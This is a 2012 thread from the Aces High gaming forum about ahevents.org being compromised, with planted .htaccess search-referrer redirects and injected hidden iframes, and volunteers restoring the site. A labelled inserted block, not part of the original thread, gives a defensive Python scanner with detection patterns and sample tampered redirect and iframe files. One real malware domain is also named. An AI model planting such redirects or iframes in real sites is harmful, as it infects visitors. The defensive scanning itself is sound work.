Aces High Bulletin Board
Special Events Forums => Friday Squad Operations => Topic started by: UncleKurt on September 08, 2012, 12:25:30 AM
-
Please allow some patience waiting for the Leaning-Into-France Frame 1 Logs. We are experiencing some internet related access issues preventing the logs from being downloaded. We apologize for any inconvenience this may cause. Logs will be made available given the earliest opportunity.
:salute
-
So it's not just me having a problem with ahevents.org?
-
It would be a Pie-Rat waiting for the score :cheers:
-
According to google, ahevents.org has been the target of a cross site scripting attack generated from a web site in Russia.
Hope this helps.
-
It does look odd....best of luck CMs!
-
And I thought it was having problems adding up all my squads kills? Good luck with this on CM's and Kurt! Don't make me come down there again! Lol
Flifast
-
Diagnostic page for ahevents.org
Site is listed as suspicious - visiting this web site may harm your computer.
Part of this site was listed for suspicious activity 1 time(s) over the past 90 days.
Of the 3 pages we tested on the site over the past 90 days, 2 page(s) resulted in malicious software being downloaded and installed without user consent. The last time visited this site was on 2012-09-06, and the last time suspicious content was found on this site was on 2012-09-06.
Malicious software is hosted on 1 domain(s), including wayoseswindows.ru/.
This site was hosted on 1 network(s) including AS46606 (BLUEHOST).
Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, ahevents.org did not appear to function as an intermediary for the infection of any sites.
Has this site hosted malware?
No, this site has not hosted malicious software over the past 90 days.
How did this happen?
In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.
The Commies! :old:
-
It would be a Pie-Rat waiting for the score :cheers:
Nothing wrong with the pie-rats :x
-
So what everyone is saying that frame 1 never really happened :bolt: :aok
-
God I hope not. That was a hella frame. :rock
-
So what everyone is saying that frame 1 never really happened :bolt: :aok
Oh it happened pal.
-
God I hope not. That was a hella frame. :rock
i had a blast. we were defending a base.......scanning for enemies, look down, and the sky is black with dots of enemy aircraft.
i'm anxious to see how it went.
-
Sorry I had to miss this one. Was in the infirmary with a stomach virus. :mad:
-
Anybody get ahold of Hitech over this issue yet?
-
Anybody get ahold of Hitech over this issue yet?
Hitech does not maintain the ahevents.org web site. It is maintained solely by the CM Team.
-
It's being looked at. Just have to be patient guys, it's the internet and its many charms.
-
They are trying to get all our information. :O
-
CM team does a pretty bang up job for FSO and the website, it's not too often that things get messed up like this. Hell this isn't even their fault.
-
The Commies! :old:
Time to Turn Russia into a BLOODY Crater :furious
EDIT: Now I am in a bad mood :uhoh
-
Ever since I tried to check the site's log I can't log into the game for more than 5 seconds before I lose connection. Any chance I got a virus from it?
-
Sorry I had to miss this one. Was in the infirmary with a stomach virus. :mad:
hope you're better south. you missed a HELLUVA frame. totally vaped the Mossies.
-
hope you're better south. you missed a HELLUVA frame. totally vaped the Mossies.
Mossies? who were you flying with?
-
Kurt, you uploaded the wrong logs.
-
Mossies? who were you flying with?
sorry meant Hurri's :bhead . was reliving a nightmare from MA last night :noid (got pounced by 2 mossies while flying the F4 lol.)
-
When I click onto the special events page I get something that says:
Jumla
this site is down for maintaince
then it wants me to log in and give my password. NOT GONNA HAPPEN!!!
This was this morning again, it was the same yesterday until last night then it was fixed, now it's back this!!! :salute
-
I 2nd what FBDragon said . . :bhead
Even though it was fixed last night for a while the logs for the other night weren't shown, sure hope we don't lose this log . . is there a chance we could lose this weeks log??? I hope we get to see them! :pray
-
In the CM's defense, there is a glaring problem and there is really only one person working on it. We are currently trying to find a short term work-around so the site will function so people can get the logs, but the issue isn't an easy fix.
The logs will not be lost by any means.
-
We have the raw logs from HTC. Those are run through a parser that generates the nice logs for you all over on AHevents.org. So the data is safe and not lost; the problem is over on AHevents.org. The site has been hacked and we are currently working on ripping out the stuff that has been inserted and also trying to secure the site from it being hit again. As Spikes said this is going to take some time but the raw data is safe.
-
:salute
CM staff.
I appreciate all that you do to make AH a better place.
-
Kudos to you guys do all this stuff :salute I know I couldn't do it!!!
-
and again I second FBDragon, thanks for the input and hope you succeed in fixing the hack :salute
-
Was the site hit on the 5th or the 6th, and is there an ETA on service restoration?
-
LOL :rofl sounds like somebody messed with the wrong person,and now they are coming back for revenge. :x
-
Not sure when it happened specifically but it was in the last several days.
No ETA as of yet since we are still trying to track down how they got in. Will update everybody when we have more news on the situation.
-
LOL :rofl sounds like somebody messed with the wrong person,and now they are coming back for revenge. :x
I fail to see the humor here. This problem has a negative effect not only on FSO logs but on all events running until the problem is fixed.
Thanks for keeping at it Ghostdancer Midi and Spikes. :aok
-
.
Thanks for keeping at it Ghostdancer Midi and Spikes. :aok
seconded. sounds like they're spending every moment of their spare time trying to solve this for us. :aok
-
Salute to those working out the hacking problem. Just a quick question...can someone from HTC post the logs on here until the site is restored? If not, then no big deal. Again, thanks all.
-
I will check with Shegotya and Squire about posting the logs here. They would be the raw logs and not pretty at all. You would be able to see who you shot down and types of object destroyed but that is about it.
Oh, and have I mentioned that I hate hackers.
-
Oh, and have I mentioned that I hate hackers.
who doesn't hate them
-
The logs are still there and there is a backup method to scoring the current frames if we have to do that. The data is there. So for now just concentrate on playing the frames and we will see where all this comes out. The September FSO will be scored.
-
well i for won LOVE hackers...it was a great movie,and angelina jolie is hot :rofl
-
:rolleyes:
-
Hey gents. Just my 2 cents... In my opinion (without access to your log files and other tools), it appears that the ahevents.org site is a launching platform for a cross site scripting attack. Here is how it works.
1. Bad guy in Russia hacked ahevents.org via some Web malware content (there are literally hundreds of ways to do this).
2. Now ahevents.org is a launching platform (for lack of better words) for attacks from the Russian site.
3. ahevents.org sits there waiting for a bunch of cartoon pilots to surf to it and check out their FSO scores
a. Cartoon pilot uses a Web browser to surf to ahevents.org
b. Once there, ahevents.org now exploits cartoon pilot's Web browser
c. Once that happens and depending upon how much security is on cartoon pilot's computer...
d. Malware is delivered from Russian site to cartoon pilot's computer
e. Russian dude now has your BoA password (assuming you bank with BoA) and all those nekkid pics of your wife :)
That's how it works. Best thing to do is reinstall ahevents.org from a known good back up.. Use a web scanner to scan it and go from there. Easier than flying a P38.
S1n1ster
-
Yep, they did two things:
1) They installed a mod_rewrite in the .htaccess file and then created additional .htaccess files in the various subdirectories (this causes anybody coming from Google, Bing, Yahoo, etc. search results to be redirected to the Russian site instead of getting to the events site).
2) Next they modified all the JavaScripts to write a hidden iframe on our pages which allows them to run a cross site scripting attack.
We have reinstalled the CMS from a clean backup and the database from a clean backup but it was reinfected (for lack of a better word) shortly after we did this. So basically we have been hunting down the exploit / weakness / loophole that they are using to get in and modify files. Once we track that down and close it up we should be good. Problem with this is it just takes a bit of time to hunt down the issue and resolve it and then test to make sure it stays resolved.
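Added example, not part of the original post or the CM team's tooling: a defender-side sweep for the two changes described above, flagging .htaccess files whose rewrite rules key on a search-engine referrer and send the visitor to another host, and JavaScript files that write an invisible iframe. The regexes, function names, the events.example and redirect.example hosts and the sample files are constructed assumptions.

```python
import re
import tempfile
from pathlib import Path

# Heuristics are assumptions for illustration, not signatures from the incident.
# .htaccess: a RewriteCond keyed on a search-engine referrer ...
REFERER_COND = re.compile(
    r"^\s*RewriteCond\s+%\{HTTP_REFERER\}\s+.*(google|bing|yahoo)", re.I | re.M)
# ... plus a RewriteRule whose target is an absolute URL on another host.
EXTERNAL_RULE = re.compile(r"^\s*RewriteRule\s+\S+\s+https?://([^/\s]+)", re.I | re.M)
# JavaScript: code that emits an iframe and makes it invisible.
IFRAME = re.compile(r"<iframe|createElement\(\s*['\"]iframe", re.I)
HIDDEN = re.compile(r"(width|height)\s*[=:]\s*['\"]?[01](px)?\b"
                    r"|display\s*:\s*none|visibility\s*:\s*hidden", re.I)

def scan_webroot(root, own_hosts=()):
    """Walk every directory under root; return sorted (relative_path, reason) pairs."""
    findings = []
    for path in Path(root).rglob("*"):  # rglob also yields dotfiles such as .htaccess
        if not path.is_file() or (path.name != ".htaccess" and path.suffix.lower() != ".js"):
            continue
        rel = path.relative_to(root).as_posix()
        text = path.read_text(encoding="utf-8", errors="replace")
        if path.name == ".htaccess":
            foreign = [h for h in EXTERNAL_RULE.findall(text) if h.lower() not in own_hosts]
            if REFERER_COND.search(text) and foreign:
                findings.append((rel, "referrer-keyed redirect to " + foreign[0]))
        elif IFRAME.search(text) and HIDDEN.search(text):
            findings.append((rel, "script writes a hidden iframe"))
    return sorted(findings)

# Constructed sample tree: one untouched and one tampered file of each kind.
SAMPLE = {
    ".htaccess": "RewriteEngine On\nRewriteRule ^index\\.html$ index.php [L]\n",
    "images/.htaccess": "RewriteEngine On\n"
        "RewriteCond %{HTTP_REFERER} ^.*(google|bing|yahoo).*$ [NC]\n"
        "RewriteRule ^(.*)$ http://redirect.example/ [R=301,L]\n",
    "js/menu.js": "function hide(id){document.getElementById(id).style.display='none';}\n",
    "js/core.js": "document.write('<iframe src=\"http://redirect.example/\" "
        "width=\"1\" height=\"1\" style=\"visibility:hidden\"></iframe>');\n",
}

def scan_sample():
    with tempfile.TemporaryDirectory() as root:
        for rel, body in SAMPLE.items():
            target = Path(root, rel)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(body, encoding="utf-8")
        return scan_webroot(root, own_hosts=("events.example",))
```

Since the post describes extra .htaccess files planted in subdirectories, the sweep covers the whole tree rather than the top-level file only; rerunning it after a restore shows whether the files have been changed again.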
-
Thank you, Ghostdancer, Spikes, and ForHIM for all the time and effort you folks have been putting into this! :salute
-
Big thank you should go to spikes here. He has put in some very, very, very long hours (basically anytime he is not working) hunting things down and working on this whole issue. I don't think the boy has gotten any sleep in a couple of days now.
-
Yep, they did two things:
1) They installed a mod_rewrite in the .htaccess file and then created additional .htaccess files in the various subdirectories (this causes anybody coming from Google, Bing, Yahoo, etc. search results to be redirected to the Russian site instead of getting to the events site).
2) Next they modified all the JavaScripts to write a hidden iframe on our pages which allows them to run a cross site scripting attack.
We have reinstalled the CMS from a clean backup and the database from a clean backup but it was reinfected (for lack of a better word) shortly after we did this. So basically we have been hunting down the exploit / weakness / loophole that they are using to get in and modify files. Once we track that down and close it up we should be good. Problem with this is it just takes a bit of time to hunt down the issue and resolve it and then test to make sure it stays resolved.
Ghost, there are open source Web vulnerability scanners out there. It will make your work a lot easier. Good luck and thanks for the hard work.
-
Site is back up. I just viewed the logs on the site, everything seems to be working fine.
-
Site is open, but we are waiting to see if a re-infection happens. It may go down at any time. Spikes and I have cleaned up what we could, patched and secured a number of items. There are a few more items to patch, but to do so would take the site offline for weeks as we update code for latest versions of the programs.
Please use caution on the web site. Until Chrome & Safari & Firefox drop the malware warning, be forewarned that it could still be a problem. Once we see the site is clean for a day or so, we'll request a review by the search engines to remove the blacklist we are currently on.
-
Site is open, but we are waiting to see if a re-infection happens. It may go down at any time. Spikes and I have cleaned up what we could, patched and secured a number of items. There are a few more items to patch, but to do so would take the site offline for weeks as we update code for latest versions of the programs.
Please use caution on the web site. Until Chrome & Safari & Firefox drop the malware warning, be forewarned that it could still be a problem. Once we see the site is clean for a day or so, we'll request a review by the search engines to remove the blacklist we are currently on.
THANK YOU GUYS!!!!!!
we know you all spent hours and hours of your valuable time getting this squared away for the community. :salute :aok
-
Big thank you should go to spikes here. He has put in some very, very, very long hours (basically anytime he is not working) hunting things down and working on this whole issue. I don't think the boy has gotten any sleep in a couple of days now.
Indeed, Spikes has been busting his hump to get this all sorted out. We all owe him a big salute.
:salute Spikes.
-
:salute spikes, great job :aok
-
:salute spikes, great job :aok
Seconded, Thirded, etc :rock :salute :aok
Thanks for spending your time for us!
-
Thanks for getting things back up :aok
:salute
BigRat
-
Well Done.
<S>
-
Shouldn't have taken you that long Spikes, jeez.
-
Outstanding work Spike and the gang! :aok :banana: :old: :rock Much appreciated! :cheers: :salute
-
:salute
Spikes
For all of your hard work. :cheers:
I appreciate it, as I'm sure many others do too. :aok
:salute
-
Thanks Gents.
:salute
-
you guys are forgetting mrmidi, forhim, ghostdancer, and i think skuzzy too......and a couple others. they all worked their buttocks off. :salute
you guys rock!! :rock
-
Big Salute to All of the cm's who got the Site back up and running...........
<S>
Molsman
-
Thanks for all the efforts! :salute :cheers:
-
Well done and thank you to everyone that worked on this for us :salute